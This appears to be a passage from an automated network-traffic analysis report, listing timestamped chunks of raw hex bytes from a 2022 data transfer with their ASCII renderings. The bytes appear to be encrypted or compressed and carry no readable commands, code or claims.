                                                                                                                                                            2022-09-29 12:45:04 UTC10708INData Raw: 82 ae 07 9a 6e aa 0a 57 af be 0d e5 aa c4 c9 e9 c1 f3 03 e5 c0 af 4c 8f 13 a4 30 61 ac 29 f4 2d b3 14 46 50 aa 94 84 ac 4a fc 31 a2 4a bf 84 e6 f3 19 27 2d 64 ed 05 05 42 d3 6e ae 05 38 b0 9a d6 88 c8 8d 07 2e dd 65 88 ce 16 87 79 51 af aa 46 78 3b e9 30 2b 2a ae 93 58 fc e4 ce 71 05 09 c5 9c 7f 98 a0 54 22 c7 ce 85 c1 de 9e 21 2a ec 58 aa a8 6a c2 84 d4 d4 37 0e 21 fb e0 d4 2f a8 74 16 a6 92 7b d4 71 34 47 f9 23 46 5c bc 16 3d 1a a4 f4 c5 6f f5 0b 4f cf a4 85 c5 8d 0c 73 76 9c 4d ed 51 1b 08 56 d1 a0 cd 33 93 f7 ea 74 ce 97 a7 36 23 ef ed 0c 81 20 8b ff c3 6f e3 5f 7d b4 c0 5f 0d 7f 28 23 c8 53 bb 99 eb 44 33 83 fa 73 8e b7 5e 6b 01 a8 22 a5 a1 ea cc 6a fa 30 a0 58 6d 43 8b e9 c2 5e da ac e7 14 ca d1 ee d0 1f 9a e5 0f af 78 f6 d8 3e 9d eb ac 9a 0e ef 4f
                                                                                                                                                            Data Ascii: nWL0a)-FPJ1J'-dBn8.eyQFx;0+*XqT"!*Xj7!/t{q4G#F\=oOsvMQV3t6# o_}_(#SD3s^k"j0XmC^x>O
                                                                                                                                                            2022-09-29 12:45:04 UTC10724INData Raw: 4c 2a 4f 1f 6e a5 a3 e5 e8 aa 64 8c a2 74 b2 21 f2 e7 3e f6 a5 f5 9f 4d 38 6f 4a b0 47 dc 7f 59 ae 76 86 a1 22 38 a4 fc dd 6d 42 a2 6e 4f 84 95 81 61 f0 3d 0f 78 0c f0 90 d3 0e f9 87 6c 50 c1 32 ce 05 ff 69 11 66 a2 a6 39 3c 10 7d ef c9 e1 0f d0 bd de 72 42 a9 21 57 0a f4 a6 a8 4e f9 08 07 f4 b2 ca 71 cd c5 4e a7 71 f0 2f 60 5c c5 d3 9e d4 1c 32 8b 48 22 39 aa 40 2f f7 cb 96 6f f7 28 f9 c2 0d 01 33 01 c1 69 98 c3 3c 55 19 34 9e 52 be 6a 9f 3c be c6 c3 10 c6 f5 76 0c f5 bb 48 2a fd df 2c 29 6e ea bb 39 69 eb f4 b7 18 ad ac 6c 91 71 01 3b e9 0b bc 56 c3 15 0d cc a5 31 8e 2e 07 ad a6 b9 f2 e6 2d 97 f6 f8 80 59 0b 77 7d 85 81 80 51 1e 2a 82 1d 9d 0c 14 54 58 31 0b c0 55 9f 27 6e 25 18 79 fe 14 7a 49 dc 1a f0 9c ce b6 43 c8 32 cf 9a 45 51 e8 d6 29 45 fe c5 e4
                                                                                                                                                            Data Ascii: L*Ondt!>M8oJGYv"8mBnOa=xlP2if9<}rB!WNqNq/`\2H"9@/o(3i<U4Rj<vH*,)n9ilq;V1.-Yw}Q*TX1U'n%yzIC2EQ)E
                                                                                                                                                            2022-09-29 12:45:04 UTC10740INData Raw: ea 80 03 07 c1 5c 88 c2 78 97 e7 d1 ac c3 5d 13 f9 8b 8f fa ea a7 71 3c 2b 2d ea 7b 9d d2 43 22 7d 30 13 bc 9c 1e b5 79 c7 d0 d8 48 30 20 7f 52 2c 1d 96 94 10 5d eb 14 da 31 a5 44 74 31 ea ef da ad ff 5f 7e 0e 68 9f 74 ed ac 39 28 54 5d e2 2c 97 e8 79 f7 47 12 5e 00 6c 52 55 94 41 d5 cd 27 3a b0 ff ba e0 3c a8 e4 ce 5e 17 bb 3a e1 29 e9 2e cf 8d 71 2d 16 f5 83 94 eb ac 4f b7 3d 2b 36 ee 22 66 c2 4d a1 54 16 59 94 0c b0 96 b0 d5 c1 2f 98 eb db cd dd ed 96 b2 ac 96 f8 a2 6d 2d e7 cd 35 eb 25 7c a4 9a f9 67 12 dc 6e 9a de 03 95 af 29 50 51 a7 df 2f 87 23 dd 91 b3 09 1e e0 e6 98 22 2b 38 16 d9 e4 6c b8 a8 f4 36 9a f3 53 71 bf 1e 3c 34 bf 7b 86 ab 90 b2 8c ca e6 5e 96 92 c0 5b 04 48 70 9b e9 45 3c e6 be 81 47 ee 33 10 7c 28 72 49 a3 72 08 f4 e2 1e c9 37 b2 0f
                                                                                                                                                            Data Ascii: \x]q<+-{C"}0yH0 R,]1Dt1_~ht9(T],yG^lRUA':<^:).q-O=+6"fMTY/m-5%|gn)PQ/#"+8l6Sq<4{^[HpE<G3|(rIr7
                                                                                                                                                            2022-09-29 12:45:04 UTC10756INData Raw: 6a 24 77 6d dd ee a9 92 a3 b0 40 d0 e0 e3 3d 3f 04 77 e9 1a 83 f7 a4 a7 91 52 49 04 27 b6 79 c5 e1 15 69 68 a9 9e 49 19 19 e7 19 62 e5 55 f1 1d 0d b0 90 e5 17 1d 36 34 c1 9c 39 ff 92 08 bb 81 f9 7e ff a5 3e 7c ac 0e 1d 2c 71 23 8d b1 82 05 70 8e 97 82 61 e2 49 84 1e 9a ec 6f 1e 74 91 38 45 12 62 87 d7 fc a7 ef 85 d8 71 55 be 26 6c 81 c2 ca 26 36 30 32 ac 91 56 0c 26 23 43 a5 9b be a6 3f 02 49 d9 0c a3 f9 f4 3f 3c 4a 4c 60 d9 6f ae 3b 31 d5 c9 c3 ef 9e 55 5e 99 76 40 6c cf c3 18 1b 05 7a e8 8c 3a 69 19 67 59 ed 31 df ae bd 8f 06 00 cc 58 9f 2d d0 c8 03 af 1d 24 5a 8b 78 c4 3b 48 53 db c7 a2 95 28 a4 22 d2 77 a6 c7 a2 30 08 68 20 94 6d df 47 35 df 03 72 18 c9 21 76 ca 2f a7 1f 86 ab 1f 1f ce cd 77 25 25 5a 55 b8 34 7f d6 21 02 1c 0d a7 2a 2f 26 5a d3 67 07
                                                                                                                                                            Data Ascii: j$wm@=?wRI'yihIbU649~>|,q#paIot8EbqU&l&602V&#C?I?<JL`o;1U^v@lz:igY1X-$Zx;HS("w0h mG5r!v/w%%ZU4!*/&Zg
                                                                                                                                                            2022-09-29 12:45:04 UTC10772INData Raw: 1b 42 e8 8a e8 d3 d2 aa 07 18 15 f9 56 e6 2d 1f cf 21 ee 97 f0 4f cd 56 d5 3c 2e 54 9e 3c 70 d8 7c 0d 9a 51 79 36 3e 4f 2a 42 0c 00 8f 79 a4 79 dc 4a 56 81 4d 60 df b1 ad 7a b4 9f 3b ad 33 96 e7 23 49 01 be bb b6 4f d5 5a ce 28 a3 26 04 50 48 cf 03 d8 36 38 57 08 18 b1 7b 20 f5 09 c4 ed 84 db 95 36 8e de 14 df c7 2a 11 8e 9d 72 bc cd c6 67 db ed a3 f7 46 3b 40 bd 9b 66 62 79 15 ee 2e d1 06 e4 5f d7 f8 86 e6 37 30 b6 bf 24 22 4a a5 c9 83 9c 5a f4 f5 00 20 13 ea 75 52 f0 69 52 6a 55 e6 73 bb e7 2e 1d 79 d7 3a 18 cb a0 29 5f f1 82 0d 4b ab f6 5c e1 a3 b6 d1 b0 d5 57 44 00 c0 f8 b7 6b b9 6c 57 3a 42 95 be 4f cf 27 2b c4 c9 24 ca 1c 8d 55 65 5a f3 78 0a d6 d2 12 dd de c4 eb a9 24 9d 1f c4 c3 15 bf 57 92 5e 9c 18 ca aa ed 16 40 38 75 83 71 08 32 80 c4 ad c4 18
                                                                                                                                                            Data Ascii: BV-!OV<.T<p|Qy6>O*ByyJVM`z;3#IOZ(&PH68W{ 6*rgF;@fby._70$"JZ uRiRjUs.y:)_K\WDklW:BO'+$UeZx$W^@8uq2
                                                                                                                                                            2022-09-29 12:45:04 UTC10788INData Raw: 5d ce e3 99 e0 92 09 8a a0 27 72 d0 c6 40 ec 7c 14 98 b2 20 d0 de d2 59 67 8d 82 4d 32 c2 56 b0 af 39 c3 50 07 30 18 89 2d 52 66 60 1a 6e 75 a0 3e bf c6 90 aa d3 4e 72 ba d3 8a 1e f5 84 92 58 15 bf a6 9d 6b 8c e1 b9 c7 60 0a 04 d2 09 11 e7 13 1f 56 52 67 9b d7 fb e0 5d ce 83 19 1f 80 4a db 17 54 79 9f c3 b7 42 68 c6 25 6c ad e5 ad da 8a c0 1c 62 f8 5f 7b 3f c3 c9 59 23 c4 ca b2 5b f2 d3 84 a1 24 89 fa f0 1a 76 30 18 9b f5 8e fb 59 fe 29 69 ce 58 ec fb af b7 83 37 d8 92 cf 2b c1 bd 12 44 5e 6e 9e 93 d7 f5 4a ff 5c cd 61 bd 37 3b 57 cd 61 80 97 c1 64 20 01 00 5b 30 19 a8 96 b4 13 83 be e7 15 98 e7 b3 b2 ff 8a 04 4e a8 a1 0b 25 a7 ba 9d b7 75 86 72 54 9a 2e 89 a4 58 45 e5 40 35 4b 53 ed 6a 39 d6 f4 ca 4d 30 2f ad c6 1c af 2e 4e 13 a8 0b d4 aa 71 64 0e 72 41
                                                                                                                                                            Data Ascii: ]'r@| YgM2V9P0-Rf`nu>NrXk`VRg]JTyBh%lb_{?Y#[$v0Y)iX7+D^nJ\a7;Wad [0N%urT.XE@5KSj9M0/.NqdrA
                                                                                                                                                            2022-09-29 12:45:04 UTC10804INData Raw: 03 cf 90 b0 b8 a9 62 80 bf 6a e1 ee c1 40 d4 19 65 44 92 c5 70 06 00 00 fd f8 f0 4c d1 46 65 9c b8 0e 1c c9 b9 c0 d6 de 12 0f 06 52 57 8a 22 e1 60 33 e6 87 12 7c bf a8 24 a2 57 17 53 94 0d 5b a0 78 7b f0 24 97 78 cd 59 72 15 05 c3 cc c1 2c 26 18 39 99 79 95 70 07 72 e1 9c 10 8d 91 0e e0 77 1f 3d 6c 8f ed 7f 22 ce c6 2a eb dc 61 fd 31 0e d7 9c c5 a5 97 17 ca d5 0f 59 08 3b 0e 87 1e aa b9 2c cc 9c 93 c6 3e 79 21 c3 db 7d 51 8b 4c 5f 60 a8 de f3 bb a2 cb 3a aa 09 ca 8d 8c 52 28 43 72 7c 67 fb 90 a8 33 37 ea df 81 78 06 f4 68 89 bc e7 65 ae 37 c3 d2 17 97 27 c0 09 89 ba 6a d2 b3 5e 61 62 24 78 3d 27 92 81 b6 f8 53 82 e8 7c 7e f0 18 82 b0 70 5a 2e f2 bb 98 70 19 e0 5e 6f ee 88 66 aa 61 aa f9 06 35 12 55 9d 41 4e af b1 93 9f 8b 52 71 66 75 b4 cf f4 b0 56 df e1
                                                                                                                                                            Data Ascii: bj@eDpLFeRW"`3|$WS[x{$xYr,&9yprw=l"*a1Y;,>y!}QL_`:R(Cr|g37xhe7'j^ab$x='S|~pZ.p^ofa5UANRqfuV
                                                                                                                                                            2022-09-29 12:45:04 UTC10820INData Raw: 52 77 a3 fe 10 5e 0f 43 6a 5a 03 4d e7 7e ea c8 0a ec fa 58 53 d3 72 4e 24 7b 85 de d9 3a a2 38 21 15 69 26 d4 02 d0 96 5e d6 ba ef 2b 33 d5 86 58 76 20 6e a4 74 c2 57 a1 51 37 f7 fa ed 01 a6 61 85 77 9c 4f 92 6a 41 82 ce 49 82 56 2c 07 22 48 0e ac a4 be de 9e 29 7a 59 99 6a da 64 4a a9 3a 8d 6c df 6e df bc 5f 20 d0 f6 29 40 13 a8 cc 32 02 47 24 42 a4 7d 63 de af 64 74 f5 7a 36 07 44 15 a4 fe ff ef 35 84 eb 35 42 2a 0a 62 9b 4a 2b 9b 45 15 67 88 d6 cc 0b a4 08 5e ca 47 80 87 96 93 a9 62 62 5f 34 f6 61 d2 3a 39 c9 5a 48 85 d9 ab c8 fa 7b 13 21 dd 43 49 d9 84 a3 9a 08 0e df 73 5e ab ec 24 b8 5f c7 63 db 2e 62 e8 d2 0d 20 16 fe 62 cf 25 fc 55 2c 3e 14 a9 22 cc 51 7b 38 46 52 f1 f8 97 bc c2 62 a5 45 e3 3e 5b 97 fc da 52 69 6a 19 a8 49 24 bf 8e ac 69 90 cc 59
                                                                                                                                                            Data Ascii: Rw^CjZM~XSrN${:8!i&^+3Xv ntWQ7awOjAIV,"H)zYjdJ:ln_ )@2G$B}cdtz6D55B*bJ+Eg^Gbb_4a:9ZH{!CIs^$_c.b b%U,>"Q{8FRbE>[RijI$iY
                                                                                                                                                            2022-09-29 12:45:04 UTC10836INData Raw: 6a ff 7f d5 91 3e fd 49 96 e7 25 74 04 12 e6 93 70 9e f7 5a 2c 2d 3e 40 23 e4 ac a6 10 10 cc 57 86 b5 91 32 ce 20 e4 63 4e 13 22 42 49 45 ca 0c e1 0e d1 62 00 25 cc b6 42 85 4e 2d fc e3 10 53 c7 fa ad 3d 4f d8 7e 3b 0c 26 52 3e ca e0 f8 c4 f6 7b 38 fe ba 54 e8 13 b4 ef fa 6a d1 8b 7c 3e ba 9f fc 71 82 fa 3c df 19 14 7b b6 2e 3b c8 46 3d 91 ee 12 0a 42 2f 53 2f cf 2d 34 30 0e 4a 09 4b c1 00 f4 83 0d e9 2f 02 2c 23 b8 a2 86 17 03 11 c4 b8 fc 7f 78 dc 0f b3 9c b9 46 1b 33 89 86 77 1d fd a2 df 5f 76 e3 be a5 21 23 f7 58 c6 72 f4 3c a2 25 70 8b 42 43 bf 16 bc 91 5f f7 a4 af f8 16 8b eb bc a2 3b 20 e2 0f 90 55 5d 15 7d 23 59 6d 31 1c 39 62 c8 f7 24 e7 c1 ea 82 e9 f2 e8 0c d6 82 f3 34 fe d2 09 ff b7 65 75 ad 25 1f 23 6a 4d a4 0e 42 e9 33 b9 83 e4 79 04 80 09 86
                                                                                                                                                            Data Ascii: j>I%tpZ,->@#W2 cN"BIEb%BN-S=O~;&R>{8Tj|>q<{.;F=B/S/-40JK/,#xF3w_v!#Xr<%pBC_; U]}#Ym19b$4eu%#jMB3y
                                                                                                                                                            2022-09-29 12:45:04 UTC10852INData Raw: 2c 0d 18 67 1b ac d9 62 79 d3 91 6d ae 8f 5f 27 4f 7b 73 36 90 76 b5 67 aa 6f b4 f3 43 0b 80 ff 9d 80 cc 23 78 2b 5d b3 54 ad 32 11 cd 51 c9 9b be fc 8f 2f 8f 87 6c 2f 3f 3d 25 2e 47 1a 7d 9e 1f 42 98 12 a6 13 75 ff e9 1e 00 02 70 e6 7b a7 f9 83 e1 23 3e 54 68 5e fa ee ad 73 9e 3e 21 2a ca c8 35 b8 d0 0d 86 e5 4c b6 6a 7a 09 48 19 78 87 af 20 6d 15 c0 f9 2b 8b a6 22 70 8a fd 46 a1 ee fe cc 5e c0 df 3a b6 49 13 d3 6a bd 5b 7a df a2 17 bc aa 8b 60 cb 77 fa 96 c2 ea 09 31 1f f1 c6 a3 a6 e8 e6 48 43 61 0f 38 67 97 ce 14 b7 96 84 22 5a 93 5a c3 e0 58 80 bf c4 40 df 9b 30 63 c7 4b 61 4d 6e 93 07 8e ed 7b 0e 7a 7e 75 e0 2f 83 d8 40 68 34 48 58 ce 62 a6 93 68 c9 db 0b 2c 8e 1f bd cd da 83 66 e6 36 4f 88 f9 22 4a 85 a2 7c 44 9b bf db c8 82 3c ca 03 c8 4b e7 6a 4d
                                                                                                                                                            Data Ascii: ,gbym_'O{s6vgoC#x+]T2Q/l/?=%.G}Bup{#>Th^s>!*5LjzHx m+"pF^:Ij[z`w1HCa8g"ZZX@0cKaMn{z~u/@h4HXbh,f6O"J|D<KjM
                                                                                                                                                            2022-09-29 12:45:04 UTC10868INData Raw: 70 c4 6b 51 26 05 e3 20 52 92 3d fc 2d a0 2e 72 ee 5c ab 55 6b b3 11 0d 60 ca 4a bf 1e fd d6 04 5d 0f 06 9c ef 20 6b 5f 41 17 6f 80 d8 ac b2 06 c9 b8 73 10 26 ab cb f1 79 c4 4a 48 72 9a 1c 55 6f fb f2 26 db fa 9c 7e fd 11 01 be ef ff 31 0c c6 f7 0b 76 e3 22 bf b5 67 89 30 12 d3 20 07 ec ea a4 94 1a c2 04 c0 14 c2 b9 b8 60 d9 f6 fd 01 13 1d 6d 02 e5 f6 77 64 0e b5 d7 1b a1 8d 0a af 30 58 5f 6c 08 25 7a da bd d4 1c 4b 21 ed 42 ff 0e 29 c3 8f fc 02 f7 de 78 2b 8b 5f 33 8d 94 b7 ba 0b 3d 18 f1 89 c8 07 34 fe c7 10 f9 5f 41 30 03 fc 86 f6 47 31 39 99 75 60 12 33 a9 6d 13 7b d0 0e 0d 45 e4 68 9c d7 9c 64 6a b2 23 e0 75 10 cc b9 50 18 bb 27 3b 2a 5c 22 4f b6 c2 32 35 da f6 a4 f1 9d 1c c4 6f 28 76 db 5d ee 0b a2 95 50 6e 21 eb 9e bf e6 bd 3b 41 83 f6 e7 6e 8d 05
                                                                                                                                                            Data Ascii: pkQ& R=-.r\Uk`J] k_Aos&yJHrUo&~1v"g0 `mwd0X_l%zK!B)x+_3=4_A0G19u`3m{Ehdj#uP';*\"O25o(v]Pn!;An
                                                                                                                                                            2022-09-29 12:45:04 UTC10878INData Raw: 20 0d 3e e0 6f 39 d2 3a 86 ae a0 47 c8 c3 1f b9 df 2d e2 07 ad 7e 28 bd 91 52 8a e4 11 a0 8b 1c b4 6d 57 34 a4 60 1e f8 0b 71 8d 3e 79 8f d5 4d 5d 7a 04 5f 85 cb 58 cc 20 e5 31 b0 58 9b c9 93 7d c7 3e 88 9f 90 21 fb 12 89 6a da 85 5e 57 4f 84 f4 6b 0b bc 4d 42 a2 ca 1f af 99 8b 3f 77 e3 77 78 c7 2b 98 bc cf 1a 6d 30 47 0b b9 30 d1 cc 8e 6a b9 11 69 59 b2 43 75 ed e0 e9 ee 70 43 ab 38 8f ae bc 3c 3c 72 1b a6 c6 69 cf cc c0 36 37 19 5f 91 bc 51 46 f1 0f 08 d7 00 cb 2b 2e d9 0b 04 08 42 be 09 56 dd 50 32 b0 0c 0d 8e 53 02 6e f8 2d f5 9e fe 2f d3 77 33 37 6e ef 4c 99 18 50 80 a7 ae 50 28 99 1a a7 f6 79 dd 6a fd f6 5c 88 01 28 fb f6 c3 0e 0e 70 a7 d9 dd 6e a1 a5 bc ee 4e f6 57 d5 03 a3 e8 14 b4 86 1b fb 35 03 fe 5f 01 33 da 7d 8d 64 1d f7 5e 31 ef a8 bd c3 30
                                                                                                                                                            Data Ascii: >o9:G-~(RmW4`q>yM]z_X 1X}>!j^WOkMB?wwx+m0G0jiYCupC8<<ri67_QF+.BVP2Sn-/w37nLPP(yj\(pnNW5_3}d^10
                                                                                                                                                            2022-09-29 12:45:04 UTC10894INData Raw: 25 e9 22 86 c2 c4 82 00 d5 99 65 d5 8e ba b4 c3 de 96 32 9a 56 1c ea 95 6c 1c 4f 4a 57 da c7 7f cb 56 07 38 f6 0a 44 9f af c5 65 9d 0e f4 79 01 61 1f b1 d1 10 01 f9 8b 2c a5 3e 5d 9b dc a1 69 f6 3b 4f 95 c5 d3 8e 7f c3 ef 9a 8b 0f 21 80 54 61 ae 7d dd b8 87 a1 dd 3e 9f 15 6c a8 c9 bf 99 f1 c2 99 88 55 07 bc 7c 0b a8 98 2d 08 a2 b0 ce 3c b2 fe 16 1a a9 39 5c 1b 52 68 0a 5f 34 30 63 28 34 66 4d 2c 3b 5e 91 a3 de b4 9b 7d 86 dc 06 bd fa b6 3c df 35 a1 24 da 21 24 f8 23 63 8d 09 d5 a9 fc 84 99 46 ae d5 9d dd a1 9c fd 68 19 5e f6 f2 74 8e c4 e4 6b 64 ae 7b 82 f3 d7 6d 1e 5a 06 cd 2f 78 4f ea 51 ac 3c 8a b6 80 9b cf 2d 6d f8 10 3b e5 dd 1f 20 bd 83 41 ec 81 87 bf eb e9 86 04 1b 4a fb aa 6a ee b4 2a 86 15 dd 68 b2 14 bf 03 7f 15 31 fa 0e 69 fc eb 49 38 b5 c1 ea
                                                                                                                                                            Data Ascii: %"e2VlOJWV8Deya,>]i;O!Ta}>lU|-<9\Rh_40c(4fM,;^}<5$!$#cFh^tkd{mZ/xOQ<-m; AJj*h1iI8
                                                                                                                                                            2022-09-29 12:45:04 UTC10910INData Raw: f7 9c 76 a1 a7 1c 6c 71 3b b1 2f bb 01 6d 80 fe 30 9c b6 80 e7 ea 5a 45 98 89 a4 af d0 5a a2 60 26 0c 62 27 fd 2f e5 6f b6 e7 aa b5 98 a6 05 53 50 21 be 97 e3 d1 3c 5a bc 19 09 8d 30 7d 50 69 f2 3d e6 d6 df 72 ce 8a db 04 13 5d 5c cd 30 35 d0 ac 73 49 69 77 49 91 11 50 57 a5 18 78 d8 a2 05 d8 45 dc 03 29 f4 69 eb 07 7c 96 1b dd 16 bf 0f b9 75 68 e8 1a c8 f6 48 6a a1 2e 88 6a c2 f0 89 1d 3b 66 6e 85 d5 c3 98 ae 05 c5 35 c4 90 e2 22 30 c5 84 36 11 2f b6 36 50 b6 5b 96 3b 3c 41 ad 02 29 08 9d f0 f0 9f 5d 79 af de c8 e1 84 3d 56 42 f5 d7 93 61 c5 a9 8e f0 e5 b8 a7 c1 d2 ce 96 f5 93 9d e2 3f 41 2e 15 eb 70 a3 78 d7 9a b4 c3 55 79 4a 89 d7 21 77 54 b6 3d 1b a3 e9 19 d0 de 50 5c 3d 09 a9 dc 67 6a cd d1 85 22 38 e2 99 75 24 2f 50 0a 24 28 ed 20 74 1a 7c e4 d7 75
                                                                                                                                                            Data Ascii: vlq;/m0ZEZ`&b'/oSP!<Z0}Pi=r]\05sIiwIPWxE)i|uhHj.j;fn5"06/6P[;<A)]y=VBa?A.pxUyJ!wT=P\=gj"8u$/P$( t|u
                                                                                                                                                            2022-09-29 12:45:04 UTC10926INData Raw: ae bd 18 45 44 73 27 8f 3a b1 bb 28 2c 5d 09 51 d7 11 b4 22 b7 47 b9 a4 90 35 f8 49 1a 78 1e d6 ea fc 60 75 84 71 5c 3c b4 ca 7e 94 a0 c5 3b 48 37 3c f1 60 fb 48 d8 69 05 8d 77 73 e7 3d 6a 58 27 e3 62 29 da 3c ee b9 1b 33 cc c7 7d 7b 58 2f 8b 26 cb 50 e5 72 0a 71 44 0a 03 aa 63 94 64 0c fc 7a da 4c a2 48 2d 1e 98 1c 1f 21 45 d4 e8 b5 28 df 95 d5 07 df 05 f3 1e a0 57 a8 c0 25 5e ce 0e 90 18 c4 2a 8c 67 9e da 54 dd 46 74 d3 12 55 a3 92 86 e0 07 0a d1 84 16 3a 24 a2 9b 27 3b a0 4c 2e 88 47 1d 15 a9 ba 0f 84 3a 83 06 42 58 36 aa 50 d4 14 a0 90 66 72 4e 06 2a 36 9d fd 71 18 94 45 44 71 eb 16 ca 70 7f 1d 2f e7 bc b1 ba 3f 68 55 fb 7c ac fb 10 54 c2 89 42 9b 20 f0 65 53 8b f7 d5 8a 76 79 7f 85 72 92 cd 8b 6c 61 89 f3 26 8d e2 dd 94 6c 24 c1 a8 6a 75 78 a3 7f 8a
                                                                                                                                                            Data Ascii: EDs':(,]Q"G5Ix`uq\<~;H7<`Hiws=jX'b)<3}{X/&PrqDcdzLH-!E(W%^*gTFtU:$';L.G:BX6PfrN*6qEDqp/?hU|TB eSvyrla&l$jux
                                                                                                                                                            2022-09-29 12:45:04 UTC10942INData Raw: 75 14 ca a3 d2 28 fc 77 fc 3c c9 bf 3d 6f 55 90 73 cc 42 8a b1 c3 04 a1 2b 97 0c dd 5b 47 21 2d 7d 47 b7 cd a7 9d 1a 78 ab 83 4c 98 0c a9 12 a2 d8 a3 d2 ab 99 aa 2e 74 e4 a2 e7 ed 82 66 d1 86 92 16 22 14 77 34 27 65 96 3e 51 a5 05 06 f5 c7 eb 3a 19 b3 1e 8c 9f 05 79 a2 9f 83 97 00 c3 0d b5 cd 02 9a 4f 15 f6 d3 de 21 d3 c7 25 8f 1e da 12 6c a9 47 7e b3 8f 71 b1 0a 90 61 a8 35 de 43 e0 c3 96 f9 9b 1c fd da da 5f 0a 48 a8 9c 9d dc cc 6c 12 c8 2d 11 6c 3a 9d 68 69 9f 13 c5 79 8e f0 07 6a 2e 89 c9 65 e0 2b 17 ec 7a 60 2b 05 a2 0c fb 2d 48 b4 0c cb 7c 47 93 2c 96 94 d3 29 04 c6 23 a2 37 b5 fa 53 69 a2 5a 35 8f 58 07 4b 9a d1 91 54 8f 48 ce 7a a7 90 4a ad 8f 92 e1 52 0a 1d b1 d4 86 76 a3 94 43 ec d4 32 1f 8b 18 b7 0e 8c b3 62 b8 04 69 8b 70 32 f5 6a eb 77 6f 62
                                                                                                                                                            Data Ascii: u(w<=oUsB+[G!-}GxL.tf"w4'e>Q:yO!%lG~qa5C_Hl-l:hiyj.e+z`+-H|G,)#7SiZ5XKTHzJRvC2bip2jwob
                                                                                                                                                            2022-09-29 12:45:04 UTC10958INData Raw: 94 34 92 cd 42 eb 18 b5 29 20 4b 03 96 3d 40 b5 72 20 fe 8e ff 45 17 17 1b 55 8d 5a 9e 9f c9 3a eb 12 26 0c 42 55 d9 a6 73 3e ca 20 ff e8 68 11 b6 e3 e3 45 63 c1 4f 6f 2e 4c c4 11 7b b7 3c 2d ca 90 fc 22 8c 25 fd c6 22 6c 03 88 93 03 e8 75 1a a2 45 14 00 54 95 48 63 73 94 72 d4 16 26 ad df 4f 01 ea aa 1e 88 16 97 96 1a 09 e8 ad 20 50 97 c7 65 34 09 b9 22 ae 56 a5 d5 5f f0 95 2c 90 86 b5 8e 3f 85 04 29 16 fd ea 87 4a 8b fa cb 3e 26 cb 4d f5 95 22 ed c3 9f 1a 06 bd 40 a0 9f bf 84 66 d6 28 bd f0 28 f5 03 57 2c af c2 ef e1 bc 15 e9 6e eb 2e 0b 9c 63 88 26 0e b0 90 e4 f2 b5 11 86 2f b7 33 2e a6 9f 23 5c 89 8a f5 8c 04 9b 63 ee ee 1f 56 bc 3d 2c 1d 3b 33 ff 3f 7d 83 f7 2d 85 b6 a0 6d fd 56 77 c6 e9 08 68 dc 80 7a 7b 96 0a 0b ac a5 03 54 b6 99 bb a6 2b 97 86 3e
                                                                                                                                                            Data Ascii: 4B) K=@r EUZ:&BUs> hEcOo.L{<-"%"luETHcsr&O Pe4"V_,?)J>&M"@f((W,n.c&/3.#\cV=,;3?}-mVwhz{T+>
                                                                                                                                                            2022-09-29 12:45:04 UTC10974INData Raw: f7 3e 49 a8 f9 7e 28 0d 5a 53 43 8d b7 16 81 3d be 58 9f f5 28 9d 7a a7 f4 ac 98 f7 dc de 25 9d c6 9e 76 41 f6 4d f5 be f2 74 9c 59 65 77 9b cd b0 d8 6c 4b fe 93 16 56 82 01 62 1e 62 e9 38 58 56 49 89 32 8e 90 bf 39 c9 d8 89 d1 23 a4 f1 12 36 83 f7 68 80 3a b6 22 eb a7 61 c1 cc 1d 78 73 1f 61 c0 52 66 99 d2 1c 97 4c e2 78 75 36 a0 98 1e 23 1e 76 73 b4 7f 82 2e b8 f7 c5 d1 df bc f0 a8 1d 54 4d a7 0b 77 fb 7a f3 aa 4a 33 e9 55 d6 76 aa 57 b8 98 4c d7 42 e8 ff 95 80 dc 89 5e f5 b0 47 f0 49 0f c7 10 75 c8 21 7f d0 ac 5d 11 a1 17 cb 44 45 57 07 64 ee 9e a8 c7 48 a6 45 52 d4 0e d2 47 64 fe 83 6e d2 e8 91 34 86 84 b5 e5 9e 79 ff ed 0e d7 8f c1 24 5d f7 37 7c 19 8b e2 6c 23 d0 7c 73 f2 d1 be bb 43 39 48 aa e3 cd 71 02 b8 42 f7 f7 47 96 2d cd 79 cb 93 9f 8b b7 a9
                                                                                                                                                            Data Ascii: >I~(ZSC=X(z%vAMtYewlKVbb8XVI29#6h:"axsaRfLxu6#vs.TMwzJ3UvWLB^GIu!]DEWdHERGdn4y$]7|l#|sC9HqBG-y
                                                                                                                                                            2022-09-29 12:45:04 UTC10990INData Raw: e5 c2 96 d4 50 64 f7 f9 c4 1e 1d 83 60 2a 44 f5 2f 4f 50 9a cd c1 87 6f 92 f6 47 8a fd f8 64 01 c3 fd 8f 8f 8e bb 3c d5 70 54 7a 6b af 0c 32 c4 d6 de ac c0 cf 9d 8c c2 c8 0a 3a 5b 17 be 7e 82 56 46 0e 1b ec b4 a6 64 b5 65 92 c4 92 02 ad 45 83 8b 9c 2d c1 c6 4d 10 b6 d0 88 11 5f e4 b2 ec 6a ac 68 f6 99 fc b4 4a e7 2e 46 ec e7 94 5d 34 4a b9 44 6c 0e 51 64 3c 52 4b 2c f5 4a d0 46 23 34 8f 73 b9 b8 8c 11 68 20 d7 1f 8a ff 73 9d 8b 83 6a ec 38 9c ae fc 42 5c 4a bf 24 73 76 23 7b e2 3b 36 46 c9 a4 e1 8e cc 56 73 c7 a8 5e 8c 7a cf 11 8f 3c 52 bb ba f8 96 7a 0e 25 d4 cb 78 21 35 e3 85 e7 19 fc bc 3d 78 39 a4 20 00 8d 2a 11 07 46 5d c6 74 cc c1 b5 4d 03 15 37 31 c8 a1 dc 9b b8 8e a0 c7 b0 fd bc 7e 48 34 19 38 a5 29 7d 28 36 94 38 0b d8 c5 00 e7 1b b4 74 09 82 af
                                                                                                                                                            Data Ascii: Pd`*D/OPoGd<pTzk2:[~VFdeE-M_jhJ.F]4JDlQd<RK,JF#4sh sj8B\J$sv#{;6FVs^z<Rz%x!5=x9 *F]tM71~H48)}(68t
